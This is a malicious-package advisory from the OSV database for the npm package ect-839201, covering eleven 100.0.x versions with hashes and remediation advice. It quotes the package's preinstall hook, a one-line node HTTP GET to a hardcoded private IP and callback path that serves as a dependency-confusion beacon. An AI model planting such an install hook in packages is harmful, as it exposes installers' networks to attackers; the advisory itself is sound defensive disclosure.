MAL-2026-5720

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ect-839201/MAL-2026-5720.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5720
Aliases
  • GHSA-v786-gqcj-q437
Published
2026-06-12T21:31:03Z
Modified
2026-06-16T00:01:52.293789357Z
Summary
Malicious code in ect-839201 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3)

package.json declares a preinstall lifecycle hook that runs node -e "require('http').get('http://10.107.121.85:8001/callback_839201')" on npm install. This unconditionally issues an HTTP GET to a hardcoded RFC1918 address (10.107.121.85:8001) over plaintext, with a path (/callback_839201) that encodes a unique per-package probe identifier. The behavior fires automatically as part of the install lifecycle with no opt-in. The combination of (a) a bare-IP, non-publisher destination, (b) a unique callback identifier matched to the package name, and (c) plaintext HTTP on an internal/private network is the canonical dependency-confusion reconnaissance beacon: it confirms reachability from the installer's network into an attacker-controlled listener and leaks the installer's source IP, install timing, and the fact that this specific probe package resolved inside the target environment. Even though the captured request body is empty, the install itself is the signal — successful callbacks identify victim networks for follow-on attacks.

Source: ghsa-malware (c197c5ca663d17b7e5066105f3ba265586a2f5eee6a3d7182964e53e909f2c06)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "100.0.5"
            ],
            "sha256": "0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3",
            "modified_time": "2026-06-12T21:31:08Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T21:38:19.648555582Z",
            "id": "IN-MAL-2026-006253"
        },
        {
            "versions": [
                "100.0.1"
            ],
            "sha256": "bc2c87ec3e641238241b56b82bb2f23b1233cb0ee45b84d9a3d13fad5c5bc39f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T21:31:13Z",
            "import_time": "2026-06-12T21:38:20.119839154Z",
            "id": "IN-MAL-2026-006259"
        },
        {
            "versions": [
                "100.0.6"
            ],
            "sha256": "cd3b1145f4a6431cfab9f99386ca5f3836264e9227645c0737f79063f5928c95",
            "modified_time": "2026-06-12T21:31:04Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T21:38:19.456300826Z",
            "id": "IN-MAL-2026-006248"
        },
        {
            "versions": [
                "100.0.7"
            ],
            "sha256": "137f5864651bbecabccb0ab802dabf21d4847a2356298863fe8ec6f95bbcd905",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T21:31:12Z",
            "import_time": "2026-06-12T21:38:19.961748554Z",
            "id": "IN-MAL-2026-006257"
        },
        {
            "versions": [
                "100.0.2"
            ],
            "sha256": "7504c126c6e8e509d3735d2d3edaadff2de6dab101bbacbde12b40ee573edcd9",
            "modified_time": "2026-06-12T21:31:15Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T21:38:20.225549673Z",
            "id": "IN-MAL-2026-006262"
        },
        {
            "versions": [
                "100.0.4"
            ],
            "sha256": "79672d260811398772fd28f2b618220b4e7f6d929e54faedaf00b989f32b9e54",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T21:31:16Z",
            "import_time": "2026-06-12T21:38:20.266676903Z",
            "id": "IN-MAL-2026-006263"
        },
        {
            "versions": [
                "100.0.3"
            ],
            "sha256": "b5d429604f05d4613e89de662cf9a108b7da207b369eac2eb743c23aaa64831c",
            "modified_time": "2026-06-12T21:31:10Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T21:38:19.873134815Z",
            "id": "IN-MAL-2026-006255"
        },
        {
            "versions": [
                "100.0.0"
            ],
            "sha256": "2d03fd94028c2a6683f9a8e5f9636f5e0a16cf30ef3f07535344bd7843c53383",
            "modified_time": "2026-06-12T21:31:14Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006260",
            "import_time": "2026-06-12T21:38:20.15354305Z"
        },
        {
            "versions": [
                "100.0.10"
            ],
            "sha256": "4f438d2e4debb57e29127b425a84338182bd31d2130b5340d41610dc96a09a62",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T21:31:06Z",
            "import_time": "2026-06-12T21:38:19.550205336Z",
            "id": "IN-MAL-2026-006250"
        },
        {
            "versions": [
                "100.0.9"
            ],
            "sha256": "6103a4281c0985ff8219f68391662609fdcef51e0df00680b776d91180dbfbe3",
            "modified_time": "2026-06-12T21:31:03Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T21:38:19.316219835Z",
            "id": "IN-MAL-2026-006246"
        },
        {
            "versions": [
                "100.0.8"
            ],
            "sha256": "69cfc3f6e8933ee43116255f4d6fff43c12a1ad7b52afba21890cf2fa2f37e17",
            "modified_time": "2026-06-12T21:31:08Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T21:38:19.615348613Z",
            "id": "IN-MAL-2026-006252"
        },
        {
            "sha256": "c197c5ca663d17b7e5066105f3ba265586a2f5eee6a3d7182964e53e909f2c06",
            "ranges": [
                {
                    "type": "SEMVER",
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ]
                }
            ],
            "source": "ghsa-malware",
            "modified_time": "2026-06-15T23:34:02Z",
            "import_time": "2026-06-15T23:52:17.807486516Z",
            "id": "GHSA-v786-gqcj-q437"
        }
    ]
}
References
Credits

Affected packages

npm / ect-839201

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

100.*
100.0.0
100.0.1
100.0.2
100.0.3
100.0.4
100.0.5
100.0.6
100.0.7
100.0.8
100.0.9
100.0.10

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "ect-839201-100.0.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-h8GG6Q5jrk4z9ANA3NXQph3aQggHqw7+erjv4yc0HJqYi7+0WqSWbmNA3Gh1qQCv5QZycrJEx+QmahyMSj/i1A==",
                "sha1": "d9aafce804d15b17c0a9da62018a3afb90dceb93"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "aac14ec3ba4c1c465dc30c2580ef4a24e89ab3f34734db3e7dce6d75b54cf0be",
            "path": "package.json",
            "tlsh": "d7d097782818e03b66c086f18d234912f132dd1a00087c0ce7e3000f86ee367a4be20c"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ect-839201/MAL-2026-5720.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]